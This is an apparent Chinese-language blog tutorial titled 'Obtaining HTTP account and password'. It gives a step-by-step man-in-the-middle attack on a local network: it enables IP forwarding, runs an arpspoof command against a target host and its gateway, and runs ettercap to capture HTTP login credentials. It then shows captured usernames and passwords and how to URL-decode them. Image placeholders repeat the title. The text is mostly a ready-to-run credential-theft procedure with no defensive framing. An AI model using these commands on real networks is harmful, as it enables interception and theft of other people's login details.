http账号及密码的获取

时间:2023-01-26 16:21:57
  • 开启ip转发功能echo 1 >/proc/sys/net/ipv4/ip_forward
    由于安全的因素,linux默认是禁止转发数据包的。数据包的转发属于路由器的功能,用于经内网中的数据包转发到公网中。
    /proc/sys/net/ipv4/ip_forward文件中的内容默认是0,要启用转发功能,需要将该文件内容改为1,
    http账号及密码的获取
  • arp欺骗arpspoof -i eth0 -t 192.168.110.130 192.168.110.2
    http账号及密码的获取
    在目标主机上可以看到,已经生成动态网关地址
    http账号及密码的获取
    另开一个终端,输入ettercap -Tq -i eth0
-T:文本模式 q:安静模式
i:指定网卡

如下图所示,流量截取已经开始
http账号及密码的获取

在目标主机上浏览http网页,
http账号及密码的获取
看一看到已经截获到了目标主机的登录信息
http账号及密码的获取

如果用户名是中文,可以使用url解码即可
http账号及密码的获取

http账号及密码的获取